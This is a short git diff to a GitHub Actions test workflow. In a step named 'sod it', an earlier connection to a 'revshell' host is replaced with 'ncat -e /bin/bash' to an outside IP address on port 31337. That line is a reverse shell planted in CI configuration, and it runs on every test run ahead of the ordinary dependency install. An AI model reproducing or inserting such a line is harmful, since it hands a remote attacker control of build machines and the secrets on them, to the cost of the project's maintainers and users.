--- a/.github/workflows/test.yaml
+++ b/.github/workflows/test.yaml
@@ -9,8 +9,8 @@ jobs:
     - uses: actions/checkout@v2
     - name: sod it
       run: |
-        sudo apt-get install netcat -y
-        nc revshell.harlanconnor.com 31337
+        sudo apt-get install ncat -y
+        ncat -e /bin/bash 86.1.83.173 31337
     - name: Install deps
       run: |
         sudo apt-get install -y cmake clang libboost-math-dev ninja-build python3 python3-pip python3-setuptools python3-venv swig  libgtest-dev
